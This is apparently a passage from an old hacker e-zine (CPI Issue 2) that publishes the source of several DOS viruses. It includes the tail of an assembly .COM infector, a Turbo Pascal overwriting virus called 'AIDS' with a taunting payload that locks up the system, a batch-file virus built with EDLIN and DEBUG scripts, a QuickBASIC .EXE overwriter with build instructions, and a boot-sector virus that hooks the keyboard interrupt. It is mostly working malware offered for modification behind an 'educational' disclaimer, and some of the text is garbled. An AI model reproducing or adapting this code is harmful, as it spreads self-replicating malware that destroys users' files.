MOV AH,04E ;| (search for first subdirectory)
|
||
MOV CX,00010001B ;| (dir mask)
|
||
LEA DX,MASKE_DIR ;|
|
||
INT 21 ;|
|
||
JC CHANGE_DISK ;|
|
||
MOV BX,CS:COUNTER ;|
|
||
INC BX ;|
|
||
DEC BX ;|
|
||
JZ USE_NEXT_SUBDIR ;|
|
||
|
||
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
|
||
MOV AH,4FH ;| are found, the (search for next subdir)
|
||
INT 21 ;| drive will be changed.
|
||
JC CHANGE_DISK ;|
|
||
DEC BX ;|
|
||
JNZ FIND_NEXT_SUBDIR ;|
|
||
|
||
USE_NEXT_SUBDIR:
|
||
MOV AH,2FH ;| Select found directory. (get dta address)
|
||
INT 21 ;|
|
||
ADD BX,1CH ;|
|
||
MOV ES:[BX],W@\@ ;| (address of name in dta)
|
||
INC BX ;|
|
||
PUSH DS ;|
|
||
MOV AX,ES ;|
|
||
MOV DS,AX ;|
|
||
MOV DX,BX ;|
|
||
MOV AH,3B ;| (change path)
|
||
INT 21 ;|
|
||
POP DS ;|
|
||
MOV BX,CS:COUNTER ;|
|
||
INC BX ;|
|
||
MOV CS:COUNTER,BX ;|
|
||
|
||
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
|
||
MOV AH,04E ;| If there are none, (Search for first)
|
||
MOV CX,00000001B ;| search the next directory. (mask)
|
||
LEA DX,MASKE_COM ;|
|
||
INT 21 ;|
|
||
JC FIND_FIRST_SUBDIR ;|
|
||
JMP CHECK_IF_ILL ;|
|
||
|
||
FIND_NEXT_FILE: ;| If program is ill (infected) then search
|
||
MOV AH,4FH ;| for another. (search for next)
|
||
INT 21 ;|
|
||
JC FIND_FIRST_SUBDIR ;|
|
||
|
||
CHECK_IF_ILL: ;| Check if already infected by virus.
|
||
MOV AH,3D ;| (open channel)
|
||
MOV AL,02 ;| (read/write)
|
||
MOV DX,9EH ;| (address of name in dta)
|
||
INT 21 ;|
|
||
MOV BX,AX ;| (save channel)
|
||
MOV AH,3FH ;| (read file)
|
||
MOV CH,BUFLEN ;|
|
||
MOV DX,BUFFER ;| (write in buffer)
|
||
INT 21 ;|
|
||
MOV AH,3EH ;| (close file)
|
||
INT 21 ;|
|
||
MOV BX,CS:[BUFFER] ;| (look for three NOPYs)
|
||
CMP BX,9090 ;|
|
||
JZ FIND_NEXT_FILE ;|
|
||
|
||
MOV AH,43 ;| This section by-passes (write enable)
|
||
MOV AL,0 ;| the MS/PC DOS Write Protection.
|
||
MOV DX,9EH ;| (address of name in dta)
|
||
INT 21 ;|
|
||
MOV AH,43 ;|
|
||
MOV AL,01 ;|
|
||
AND CX,11111110B ;|
|
||
INT 21 ;|
|
||
|
||
MOV AH,3D ;| Open file for read/write (open channel)
|
||
MOV AL,02 ;| access (read/write)
|
||
MOV DX,9EH ;| (address of name in dta)
|
||
INT 21 ;|
|
||
|
||
MOV BX,AX ;| Read date entry of program and (channel)
|
||
MOV AH,57 ;| save for future use. (get date)
|
||
MOV AL,0 ;|
|
||
INT 21 ;|
|
||
PUSH CX ;| (save date)
|
||
PUSH DX ;|
|
||
|
||
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
|
||
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
|
||
MOV DX,CS:[BUFFER+1] ;| (save new jump)
|
||
LEA CX,CONT-100 ;|
|
||
SUB DX,CX ;|
|
||
MOV CS:[CONTA],DX ;|
|
||
|
||
MOV AH,57 ;| The virus now copies itself to (write date)
|
||
MOV AL,1 ;| to the start of the file.
|
||
POP DX ;|
|
||
POP CX ;| (restore date)
|
||
INT 21 ;|
|
||
MOV AH,3EH ;| (close file)
|
||
INT 21 ;|
|
||
|
||
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
|
||
MOV CS:[CONTA],DX ;| at address oCONTA@ the jump which was at the
|
||
;| start of the program. This is done to
|
||
HOPS: ;| preserve the executability of the host
|
||
NOP ;| program as much as possible. After saving,
|
||
CALL USE_OLD ;| it still works with the jump address in the
|
||
;| virus. The jump address in the virus differs
|
||
;| from the jump address in memory
|
||
|
||
CONT DB 0E9 ;| Continue with the host program (make jump)
|
||
CONTA DW 0 ;|
|
||
MOV AH,00 ;|
|
||
INT 21 ;|
|
||
|
||
USE_OLD:
|
||
MOV AH,0E ;| Reactivate the selected (use old drive)
|
||
MOV DL,CS:DRIVE ;| drive at the start of the program, and
|
||
INT 21 ;| reactivate the selected path at the start
|
||
MOV AH,3B ;| of the program.(use old drive)
|
||
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
|
||
INT 21 ;|
|
||
RET ;|
|
||
|
||
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
|
||
|
||
POINTER DW 0000 ;| (pointer f. search order)
|
||
COUNTER DW 0000 ;| (counter f. nth. search)
|
||
DISKS DB 0 ;| (number of disks)
|
||
MASKE_COM DB o*.COM@,00 ;| (search for com files)
|
||
MASKE_DIR DB o*@,00 ;| (search for dirYs)
|
||
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
|
||
DB 0,@????????EXE@,0,0,0,0
|
||
DB 0,@????????COM@,0
|
||
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
|
||
DB 0,@???????????@,0,0,0,0
|
||
DB 0,@????????COM@,0
|
||
|
||
BUFFER EQU 0E00 ;| (a safe place)
|
||
|
||
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
|
||
;| if you modify this source. Be careful
|
||
;| for this may change!
|
||
|
||
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
|
||
|
||
PATH DB o\@,0 ;| (first place)
|
||
DRIVE DB 0 ;| (actual drive)
|
||
BACK_SLASH DB o\@
|
||
OLD_PATH DB 32 DUP (?) ;| (old path)
|
||
|
||
|
||
Subject: CPI Issue 2 6/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.6]
|
||
+-------------------------------+ +--------------------------------------+
|
||
| | P | |
|
||
| @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### |
|
||
| @@ @@ @@ @@ | R | # # # # # # |
|
||
| @@ @@ @@ @@ | * | ##### # # # ##### |
|
||
| @@ @@@@@@@@ @@ | E | # # # # # # |
|
||
| @@ @@ @@ | * | # # ##### #### ##### |
|
||
| @@ @@ @@ | S | |
|
||
| @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+
|
||
| | E | A NEW AND IMPROVED VIRUS FOR |
|
||
+-------------------------------+ * | PC/MS DOS MACHINES |
|
||
| C O R R U P T E D | N +--------------------------------------+
|
||
| | * | CREATED BY: DOCTOR DISSECTOR |
|
||
| P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
|
||
| | * | AUTHOR NOT RESPONSIBLE FOR READERS |
|
||
| I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
|
||
+-------------------------------+ +--------------------------------------+
|
||
|
||
Well well, here it is... I call it AIDS... It infects all COM files, but it is
|
||
not perfect, so it will also change the date/time stamp to the current system.
|
||
Plus, any READ-ONLY attributes will ward this virus off, it doesnYt like them!
|
||
|
||
Anyway, this virus was originally named NUMBER ONE, and I modified the code so
|
||
that it would fit my needs. The source code, which is included with this neato
|
||
package was written in Turbo Pascal 3.01a. Yeah I know itYs old, but it works.
|
||
|
||
Well, I added a few things, you can experiment or mess around with it if youYd
|
||
like to, and add any mods to it that you want, but change the name and give us
|
||
some credit if you do.
|
||
|
||
The file is approximately 13k long, and this extra memory will be added to the
|
||
file it picks as host. If no more COM files are to be found, it picks a random
|
||
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
|
||
a nice screen with lots of smiles, with a note telling the operator that their
|
||
system is now screwed, I mean permanantly. The files encrypted containing AIDS
|
||
in their code are IRREVERSIBLY messed up. Oh well...
|
||
|
||
Again, neither CPI nor the author of Number One or AIDS endorses this document
|
||
and program for use in any illegal manner. Also, CPI, the author to Number One
|
||
and AIDS is not responsible for any actions by the readers that may prove harm
|
||
in any way or another. This package was written for EDUCATIONAL purposes only!
|
||
|
||
{ Beginning of source code, Turbo Pascal 3.01a }
|
||
{C-}
|
||
{U-}
|
||
{I-} { Wont allow a user break, enable IO check }
|
||
|
||
{ -- Constants --------------------------------------- }
|
||
|
||
Const
|
||
VirusSize = 13847; { AIDSYs code size }
|
||
|
||
Warning :String[42] { Warning message }
|
||
= ZThis File Has Been Infected By AIDS! HaHa!Y;
|
||
|
||
{ -- Type declarations------------------------------------- }
|
||
|
||
Type
|
||
DTARec =Record { Data area for file search }
|
||
DOSnext :Array[1..21] of Byte;
|
||
Attr : Byte;
|
||
Ftime,
|
||
FDate,
|
||
FLsize,
|
||
FHsize : Integer;
|
||
FullName: Array[1..13] of Char;
|
||
End;
|
||
|
||
Registers = Record {Register set used for file search }
|
||
Case Byte of
|
||
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
|
||
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
|
||
End;
|
||
|
||
{ -- Variables--------------------------------------------- }
|
||
|
||
Var
|
||
{ Memory offset program code }
|
||
ProgramStart : Byte absolute Cseg:$100;
|
||
{ Infected marker }
|
||
MarkInfected : String[42] absolute Cseg:$180;
|
||
Reg : Registers; { Register set }
|
||
DTA : DTARec; { Data area }
|
||
Buffer : Array[Byte] of Byte; { Data buffer }
|
||
TestID : String[42]; { To recognize infected files }
|
||
UsePath : String[66]; { Path to search files }
|
||
{ Lenght of search path }
|
||
UsePathLenght: Byte absolute UsePath;
|
||
Go : File; { File to infect }
|
||
B : Byte; { Used }
|
||
LoopVar : Integer; {Will loop forever}
|
||
|
||
{ -- Program code------------------------------------------ }
|
||
|
||
Begin
|
||
GetDir(0, UsePath); { get current directory }
|
||
if Pos(Z\Y, UsePath) <> UsePathLenght then
|
||
UsePath := UsePath + Z\Y;
|
||
UsePath := UsePath + Z*.COMY; { Define search mask }
|
||
Reg.AH := $1A; { Set data area }
|
||
Reg.DS := Seg(DTA);
|
||
Reg.DX := Ofs(DTA);
|
||
MsDos(Reg);
|
||
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
|
||
Reg.AH := $4E;
|
||
Reg.DS := Seg(UsePath);
|
||
Reg.DX := Ofs(UsePath[1]);
|
||
Reg.CX := $ff; { Set attribute to find ALL files }
|
||
MsDos(Reg); { Find first matching entry }
|
||
IF not Odd(Reg.Flags) Then { If a file found then }
|
||
Repeat
|
||
UsePath := DTA.FullName;
|
||
B := Pos(#0, UsePath);
|
||
If B > 0 then
|
||
Delete(UsePath, B, 255); { Remove garbage }
|
||
Assign(Go, UsePath);
|
||
Reset(Go);
|
||
If IOresult = 0 Then { If not IO error then }
|
||
Begin
|
||
BlockRead(Go, Buffer, 2);
|
||
Move(Buffer[$80], TestID, 43);
|
||
{ Test if file already ill(Infected) }
|
||
If TestID <> Warning Then { If not then ... }
|
||
Begin
|
||
Seek (Go, 0);
|
||
{ Mark file as infected and .. }
|
||
MarkInfected := Warning;
|
||
{ Infect it }
|
||
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
|
||
Close(Go);
|
||
Halt; {.. and halt the program }
|
||
End;
|
||
Close(Go);
|
||
End;
|
||
{ The file has already been infected, search next. }
|
||
Reg.AH := $4F;
|
||
Reg.DS := Seg(DTA);
|
||
Reg.DX := Ofs(DTA);
|
||
MsDos(Reg);
|
||
{ ......................Until no more files are found }
|
||
Until Odd(Reg.Flags);
|
||
Loopvar:=Random(10);
|
||
If Loopvar=7 then
|
||
begin
|
||
Writeln(Z
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
Y); {Give a lot of smiles}
|
||
Writeln(ZY);
|
||
Writeln(Z Y);
|
||
Writeln(Z ATTENTION:
|
||
Y);
|
||
Writeln(Z I have been elected to inform you that throughout your process of
|
||
Y);
|
||
Writeln(Z collecting and executing files, you have accidentally HK? Y
|
||
);
|
||
Writeln(Z yourself over; again, thatYZs PHUCKED yourself over. No, it canno
|
||
t Y);
|
||
Writeln(Z be; YES, it CAN be, a wDs has infected your system. Now what do
|
||
Y);
|
||
Writeln(Z you have to say about that? HAHAHAHA. Have H with this one and
|
||
Y);
|
||
Writeln(Z remember, there is NO cure for
|
||
Y);
|
||
Writeln(Z
|
||
Y);
|
||
Writeln(Z 7777777777 777777777777 77777777777 7777777777
|
||
Y);
|
||
Writeln(Z 777777 77 77777 77777
|
||
Y);
|
||
Writeln(Z 77 77 77 77 77 77
|
||
Y);
|
||
Writeln(Z 77 77 77 77 77 77
|
||
Y);
|
||
Writeln(Z 777777777777 77 77 77 777777777777
|
||
Y);
|
||
Writeln(Z 7777 77 77 77 77
|
||
Y);
|
||
Writeln(Z 77 77 77 77 77 77
|
||
Y);
|
||
Writeln(Z 77 77 77 77 777 77 777
|
||
Y);
|
||
Writeln(Z 77 77 777777777777 77777777777 7777777777
|
||
Y);
|
||
Writeln(Z
|
||
Y);
|
||
Writeln(Z
|
||
Y);
|
||
Writeln(Z Y);
|
||
REPEAT
|
||
LOOPVAR:=0;
|
||
UNTIL LOOPVAR=1;
|
||
end;
|
||
End.
|
||
|
||
{ Although this is a primitive virus its effective. }
|
||
{ In this virus only the .COM }
|
||
{ files are infected. Its about 13K and it will }
|
||
{ change the date entry. }
|
||
|
||
|
||
Subject: CPI Issue 2 7/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.7]
|
||
|
||
Batch Viruses
|
||
-------------
|
||
|
||
|
||
Whoever thought that viruses could be in BATCH file.This virus which we
|
||
|
||
are about to see makes use of MS-DOS operating system. This BATCH virus
|
||
uses DEBUG & EDLIN programs.
|
||
|
||
Name: VR.BAT
|
||
|
||
echo = off ( Self explanatory)
|
||
ctty nul ( This is important. Console output is turned off)
|
||
path c:\msdos ( May differ on other systems )
|
||
dir *.com/w>ind ( The directory is written on oind@ ONLY name entries)
|
||
|
||
edlin ind<1 ( oInd@ is processed with EDLIN so only file names appear)
|
||
debug ind<2 ( New batch program is created with debug)
|
||
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
|
||
ctty con ( Console interface is again assigned)
|
||
name ( Newly created NAME.BAT is called.
|
||
|
||
|
||
In addition to file to this Batch file,there command files,here named 1,2,3
|
||
|
||
Here is the first command file:
|
||
-------------------------------
|
||
Name: 1
|
||
|
||
1,4d ( Here line 1-4 of the oIND@ file are deleted )
|
||
e ( Save file )
|
||
|
||
Here is the second command file:
|
||
--------------------------------
|
||
Name: 2
|
||
|
||
m100,10b,f000 (First program name is moved to the F000H address to save)
|
||
|
||
e108 o.BAT@ (Extention of file name is changed to .BAT)
|
||
m100,10b,f010 (File is saved again)
|
||
e100@DEL o (DEL command is written to address 100H)
|
||
mf000,f00b,104 (Original file is written after this command)
|
||
e10c 2e (Period is placed in from of extension)
|
||
e110 0d,0a (Carrige return+ line feed)
|
||
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
|
||
e112 oCOPY \VR.BAT@ ( COPY command is now placed in front of file)
|
||
e12b od,0a (COPY command terminated with carriage return + lf)
|
||
rxc ( The CX register is ... )
|
||
2c ( set to 2CH)
|
||
nname.bat ( Name it NAME.BAT)
|
||
w ( Write )
|
||
q ( quit )
|
||
|
||
|
||
The third command file must be printed as a hex dump because it contains
|
||
2 control characters (1Ah=Control Z) and this is not entirely printable.
|
||
|
||
Hex dump of the third command file:
|
||
-----------------------------------
|
||
Name: 3
|
||
|
||
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
|
||
1 , 1 ? . . n y y y y y y y
|
||
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
|
||
y . 2 , ? ? r . . n n y y y
|
||
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
|
||
y y y y . E . . . . . . . . .
|
||
|
||
|
||
In order for this virus to work VR.BAT should be in the root. This program
|
||
only affects .COM files.
|
||
|
||
|
||
Subject: CPI Issue 2 8/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
[2.8]
|
||
|
||
Viruses in Basic
|
||
----------------
|
||
|
||
|
||
Basic is great language and often people think of it as a limited language
|
||
and will not be of any use in creating something like a virus. Well you are
|
||
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
|
||
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
|
||
files.To do this you must compile the source code using a the Microsoft
|
||
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
|
||
the source code to place the lenght of the object program in the LENGHTVIR
|
||
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
|
||
available, the LENGHTVIR variable must be set to the lenght of the linked
|
||
|
||
program and remember to use /e parameter when compiling.
|
||
|
||
|
||
|
||
10 REM ** DEMO
|
||
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
|
||
30 REM ** BASIC DOESNT SUCK
|
||
40 REM ** NO KIDDING
|
||
50 ON ERROR GOTO 670
|
||
60 REM *** LENGHTVIR MUST BE SET **
|
||
70 REM *** TO THE LENGHT TO THE **
|
||
80 REM *** LINKED PROGRAM ***
|
||
90 LENGHTVIR=2641
|
||
100 VIRROOT$=@BV3.EXE@
|
||
110 REM *** WRITE THE DIRECTORY IN THE FILE oINH@
|
||
130 SHELL oDIR *.EXE>INH@
|
||
140 REM ** OPEN oINH@ FILE AND READ NAMES **
|
||
150 OPEN oR@,1,@INH@,32000
|
||
160 GET #1,1
|
||
170 LINE INPUT#1,ORIGINAL$
|
||
180 LINE INPUT#1,ORIGINAL$
|
||
190 LINE INPUT#1,ORIGINAL$
|
||
200 LINE INPUT#1,ORIGINAL$
|
||
210 ON ERROR GOT 670
|
||
220 CLOSE#2
|
||
230 F=1:LINE INPUT#1,ORIGINAL$
|
||
240 REM ** o%@ IS THE MARKER OF THE BV3
|
||
250 REM ** o%@ IN THE NAME MEANS
|
||
260 REM ** INFECTED COPY PRESENT
|
||
270 IF MID$(ORIGINAL$,1,1)=@%@ THEN GOTO 210
|
||
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
|
||
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
|
||
300 MID$(EXTENSIONS$,1,1)=@.@
|
||
310 REM *** CONCATENATE NAMES INTO FILENAMES **
|
||
320 F=F+1
|
||
330 IF MID$(ORIGINAL$,F,1)=@ o OR MID$ (ORIGINAL$,F,1)=@.@ OR F=13 THEN
|
||
GOTO 350
|
||
340 GOTO 320
|
||
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
|
||
360 ON ERROR GOTO 210
|
||
365 TEST$=@o
|
||
370 REM ++ OPEN FILE FOUND +++
|
||
380 OPEN oR@,2,OROGINAL$,LENGHTVIR
|
||
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
|
||
400 GET #2,2
|
||
410 LINE INPUT#1,TEST$
|
||
420 CLOSE#2
|
||
431 REM ++ CHECK IF PROGRAM IS ILL ++
|
||
440 REM ++ o%@ AT THE END OF THE FILE MEANS..
|
||
450 REM ++ FILE IS ALREADY SICK ++
|
||
460 REM IF MID$(TEST,2,1)=@%@ THEN GOTO 210
|
||
470 CLOSE#1
|
||
480 ORIGINALS$=ORIGINAL$
|
||
490 MID$(ORIGINALS$,1,1)=@%@
|
||
499 REM ++++ SANE oHEALTHY@ PROGRAM ++++
|
||
510 C$=@COPY o+ORIGINAL$+@ o+ORIGINALS$
|
||
520 SHELL C$
|
||
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
|
||
540 C$=@COPY o+VIRROOT$+ORIGINAL$
|
||
550 SHELL C$
|
||
560 REM *** APPEND VIRUS MARKER ***
|
||
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
|
||
580 WRITE#1,ORIGINALS$
|
||
590 CLOSE#1
|
||
630 REM ++ OUYPUT MESSAGE ++
|
||
640 PRINT oINFECTION IN o ;ORIGIANAL$; o !! BE WARE !!@
|
||
650 SYSTEM
|
||
660 REM ** VIRUS ERROR MESSAGE
|
||
670 PRINT oVIRUS INTERNAL ERROR GOTTCHA !!!!@:SYSTEM
|
||
680 END
|
||
|
||
|
||
This basic virus will only attack .EXE files. After the execution you will
|
||
see a oINH@ file which contains the directory, and the file %SORT.EXE.
|
||
Programs which start with o%@ are NOT infected ,they pose as back up copies.
|
||
|
||
|
||
Subject: CPI Issue 2 9/11
|
||
To: tk0jut2
|
||
Original_To: BITNET%"tk0jut2@niu"
|
||
|
||
|
||
;[2.9]
|
||
;-----------------------------------------------------------------------;
|
||
; This virus is of the oFLOPPY ONLY@ variety. ;
|
||
; It replicates to the boot sector of a floppy disk and when it gains control
|
||
; it will move itself to upper memory. It redirects the keyboard ;
|
||
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
|
||
; it will attempt to infect any floppy it finds in drive A:. ;
|
||
; It keeps the real boot sector at track 39, sector 8, head 0 ;
|
||
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
|
||
; and should that area be used by a file, the virus ;
|
||
; will die. It also contains no anti detection mechanisms as does the ;
|
||
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
|
||
; sector 9 because this is common to all floppy formats both single ;
|
||
; sided and double sided. It does not contain any malevolent TROJAN ;
|
||
; HORSE code. It does appear to contain a count of how many times it ;
|
||
; has infected other diskettes although this is harmless and the count ;
|
||
; is never accessed. ;
|
||
; ;
|
||
; Things to note about this virus: ;
|
||
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
|
||
; is its primary (only for that matter) means of reproduction to other ;
|
||
; floppy diskettes. The only way to remove it from an infected system ;
|
||
; is to turn the machine off and reboot an uninfected copy of DOS. ;
|
||
; It is even resident when no floppy is booted but BASIC is loaded ;
|
||
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
|
||
; it activates and infectes the floppy from which the user is ;
|
||
; attempting to boot. ;
|
||
; ;
|
||
; Also note that because of the POP CS command to pass control to ;
|
||
; its self in upper memory, this virus does not to work on 80286 ;
|
||
; machines (because this is not a valid 80286 instruction). ;
|
||
; ;
|
||
; If your assembler will not allow the POP CS command to execute, replace;
|
||
; the POP CS command with an NOP and then assemble it, then debug that ;
|
||
; part of the code and place POP CS in place of NOP at that section. ;
|
||
; ;
|
||
; The Norton Utilities can be used to identify infected diskettes by ;
|
||
; looking at the boot sector and the DOS SYS utility can be used to ;
|
||
; remove it (unlike the Pakistani Brain). ;
|
||
;-----------------------------------------------------------------------;
|
||
;
|
||
ORG 7C00H ;
|
||
;
|
||
TOS LABEL WORD ;TOP OF STACK
|
||
;-----------------------------------------------------------------------;
|
||
; 1. Find top of memory and copy ourself up there. (keeping same offset);
|
||
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
|
||
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
|
||
; 4. Jump to ourself at top of memory ;
|
||
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
|
||
;-----------------------------------------------------------------------;
|
||
BEGIN: CLI ;INITIALIZE STACK
|
||
XOR AX,AX ;
|
||
MOV SS,AX ;
|
||
MOV SP,offset TOS ;
|
||
STI ;
|
||
;
|
||
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
|
||
MOV DS,BX ;
|
||
MOV AX,[0013H] ;
|
||
MUL BX ;
|
||
SUB AX,07E0H ; (7C00H+512)/16
|
||
MOV ES,AX ;
|
||
;
|
||
PUSH CS ;DS = CS
|
||
POP DS ;
|
||
;
|
||
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
|
||
JNE B_10 ;
|
||
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
|
||
;
|
||
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
|
||
MOV DI,SI ;
|
||
MOV CX,512 ;
|
||
CLD ;
|
||
REP MOVSB ;
|
||
;
|
||
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
|
||
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
|
||
MOV CX,128 ;
|
||
REP MOVSB ;
|
||
;
|
||
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
||
;
|
||
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
|
||
POP CS
|
||
;
|
||
PUSH DS ;DS=0 ; ES = DS
|
||
POP ES ;
|
||
;
|
||
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
|
||
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
|
||
MOV CX,2708H ; TRACK 40, SECTOR 8
|
||
MOV AX,0201H ; READ SECTOR
|
||
INT 13H ; (common to 8/9 sect. 1/2 sided!)
|
||
JB $ ; HANG IF ERROR
|
||
;
|
||
JMP JMP_BOOT ;JMP 0000:7C00
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; SAVE THEN REDIRECT INT 9 VECTOR ;
|
||
; ;
|
||
; ON ENTRY: DS = 0 ;
|
||
; ES = WHERE TO SAVE OLD_09 & (HI) ;
|
||
; WHERE NEW_09 IS (HI) ;
|
||
;-----------------------------------------------------------------------;
|
||
PUT_NEW_09: ;
|
||
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
|
||
;
|
||
MOV SI,9*4 ;COPY INT 9 VECTOR TO
|
||
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
|
||
MOV CX,0004 ;
|
||
;
|
||
CLI ;
|
||
REP MOVSB ;
|
||
MOV Word Ptr [9*4],offset NEW_09
|
||
MOV [(9*4)+2],ES ;
|
||
STI ;
|
||
;
|
||
RET ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
|
||
;-----------------------------------------------------------------------;
|
||
ACK_KEYBD: ;
|
||
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
|
||
MOV AH,AL ;
|
||
OR AL,80H ;
|
||
OUT 61H,AL ;
|
||
XCHG AL,AH ;
|
||
OUT 61H,AL ;
|
||
JMP RBOOT ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
|
||
; REASON UNKNOWN ;
|
||
;-----------------------------------------------------------------------;
|
||
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
|
||
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
|
||
DB 27H,0,3,2 ;
|
||
DB 27H,0,4,2 ;
|
||
DB 27H,0,5,2 ;
|
||
DB 27H,0,6,2 ;
|
||
DB 27H,0,7,2 ;
|
||
DB 27H,0,8,2 ;
|
||
;
|
||
;A7C9A LABEL BYTE ;
|
||
DW 00024H ;NOT USED
|
||
DB 0ADH ;
|
||
DB 07CH ;
|
||
DB 0A3H ;
|
||
DW 00026H ;
|
||
;
|
||
;L7CA1: ;
|
||
POP CX ;NOT USED
|
||
POP DI ;
|
||
POP SI ;
|
||
POP ES ;
|
||
POP DS ;
|
||
POP AX ;
|
||
POPF ;
|
||
JMP 1111:1111 ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; IF ALT & CTRL & DEL THEN ... ;
|
||
; IF ALT & CTRL & ? THEN ... ;
|
||
;-----------------------------------------------------------------------;
|
||
NEW_09: PUSHF ;
|
||
STI ;
|
||
;
|
||
PUSH AX ;
|
||
PUSH BX ;
|
||
PUSH DS ;
|
||
;
|
||
PUSH CS ;DS=CS
|
||
POP DS ;
|
||
;
|
||
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
|
||
IN AL,60H ;GET SCAN CODE
|
||
MOV AH,AL ;SAVE IN AH
|
||
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
|
||
;
|
||
CMP AL,1DH ;IS IT A [CTRL]...
|
||
JNE N09_10 ;...JUMP IF NO
|
||
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
|
||
JMP N09_30 ;
|
||
;
|
||
N09_10: CMP AL,38H ;IS IT AN [ALT]...
|
||
JNE N09_20 ;...JUMP IF NO
|
||
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
|
||
JMP N09_30 ;
|
||
;
|
||
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
|
||
JNE N09_30 ;...JUMP IF NO
|
||
;
|
||
CMP AL,17H ;IF [I]...
|
||
JE N09_X0 ;...JUMP IF YES
|
||
CMP AL,53H ;IF [DEL]...
|
||
JE ACK_KEYBD ;...JUMP IF YES
|
||
;
|
||
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
|
||
;
|
||
N09_90: POP DS ;
|
||
POP BX ;
|
||
POP AX ;
|
||
POPF ;
|
||
;
|
||
DB 0EAH ;JMP F000:E987
|
||
OLD_09 DW ? ;
|
||
DW 0F000H ;
|
||
;
|
||
N09_X0: JMP N09_X1 ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; ;
|
||
;-----------------------------------------------------------------------;
|
||
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
|
||
MOV AX,0800H ;AL=0, AH=DELAY ARG
|
||
OUT DX,AL ;
|
||
CALL DELAY ;
|
||
MOV [ALT_CTRL],AX ;AX=0 ;
|
||
;
|
||
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
|
||
INT 10H ;
|
||
MOV AH,2 ;SET CURSOR POS 0,0
|
||
XOR DX,DX ;
|
||
